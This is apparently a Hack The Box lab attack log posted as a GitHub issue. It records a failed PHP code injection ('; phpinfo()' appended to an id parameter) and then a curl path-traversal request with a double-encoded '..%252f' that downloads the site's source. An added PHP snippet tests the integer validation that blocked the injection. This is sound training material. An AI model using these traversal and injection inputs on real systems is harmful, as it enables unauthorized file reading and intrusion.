AngelMascaro / broscience_htb_hackingoldschool


Attack plan #4 - Code injection #19

Closed cpratlao closed 1 year ago

cpratlao commented 1 year ago

Person --> Cristian
Time --> 27/02/2023 --> 20:20 - 20:40
Action --> Code injection
Endpoint --> https://broscience.htb/exercise.php?id=2
Result --> Code cannot be injected
Output:

We will try to inject code into the URL of one of the site's posts to see whether the arguments are validated. We take the URL of one of the posts:

https://broscience.htb/exercise.php?id=2

And we append to the end --> ; phpinfo():

https://broscience.htb/exercise.php?id=2; phpinfo()

As a result we get:

Invalid ID value 

Therefore, code injection is not possible.

Since we managed to perform a path traversal to download files in the previous steps, we will examine the file "exercise.php":

┌─[lao@parrot]─[~/broscience]
└──╼ $curl --insecure https://broscience.htb/includes/img.php?path=..%252fexercise.php > exercise.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  4969  100  4969    0     0  39335      0 --:--:-- --:--:-- --:--:-- 39436
┌─[lao@parrot]─[~/broscience]
└──╼ $cat exercise.php | sed -n 4,25p
if (isset($_GET['id'])) {
    if (!empty($_GET['id'])) {
        if (filter_var($_GET['id'], FILTER_VALIDATE_INT)) {
            include_once 'includes/db_connect.php';

            $res = pg_prepare($db_conn, "get_exercise_query", 'SELECT exercises.id, username, title, image, content, exercises.date_created, users.id FROM exercises JOIN users ON author_id = users.id WHERE exercises.id=$1');
            $res = pg_execute($db_conn, "get_exercise_query", array($_GET['id']));

            if (pg_num_rows($res) > 0) {     
                $row = pg_fetch_row($res);
            } else {
                $alert = "No exercise with that ID";
            }
        } else {
            $alert = "Invalid ID value";
        }
    } else {
        $alert = "Empty ID value";
    }
} else {
    $alert = "Missing ID value";
}

As we can see in the code there is a "filter_var":

if (filter_var($_GET['id'], FILTER_VALIDATE_INT)) {

which validates that the exercise id value is an INT, and since what we inject is not an INT it returns FALSE, together with its corresponding response:

$alert = "Invalid ID value";
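An added example (not code from the BroScience target or from this repository) that reproduces the validation chain above as a stand-alone function and feeds it the kinds of input a tester would try, so the whitespace, sign, leading-zero and zero-id edge cases of FILTER_VALIDATE_INT can be observed directly; the stricter variant with `!== false` and `min_range` is an assumed hardening, not the target's code.

```php
<?php
// Reproduces the isset / empty / filter_var chain seen in exercise.php
// and returns the alert string that branch would produce.
function checkId(?string $id): string
{
    if (!isset($id)) {
        return "Missing ID value";
    }
    if (empty($id)) {
        // In PHP, empty("0") is true, so id=0 never reaches filter_var.
        return "Empty ID value";
    }
    if (filter_var($id, FILTER_VALIDATE_INT)) {
        // Only reached when filter_var returned a truthy integer.
        return "valid";
    }
    return "Invalid ID value";
}

// Assumed hardening: compare against false explicitly and bound the range,
// so a validated integer is never confused with a failed validation.
function checkIdStrict(?string $id): string
{
    $n = filter_var($id ?? '', FILTER_VALIDATE_INT, ['options' => ['min_range' => 1]]);
    return $n === false ? "Invalid ID value" : "valid (" . $n . ")";
}

// Constructed inputs: the payload from the write-up plus edge cases that a
// validator based on FILTER_VALIDATE_INT treats differently from a plain int cast.
$inputs = [
    '2',              // the legitimate id
    '2; phpinfo()',   // the injection attempt from the write-up
    ' 2 ',            // whitespace-padded
    '+2',             // explicit sign
    '02',             // leading zero
    '-2',             // negative id
    '2.0',            // float-looking
    '0',              // zero id
];

foreach ($inputs as $in) {
    printf("%-14s -> %-18s | strict: %s\n",
        var_export($in, true), checkId($in), checkIdStrict($in));
}
```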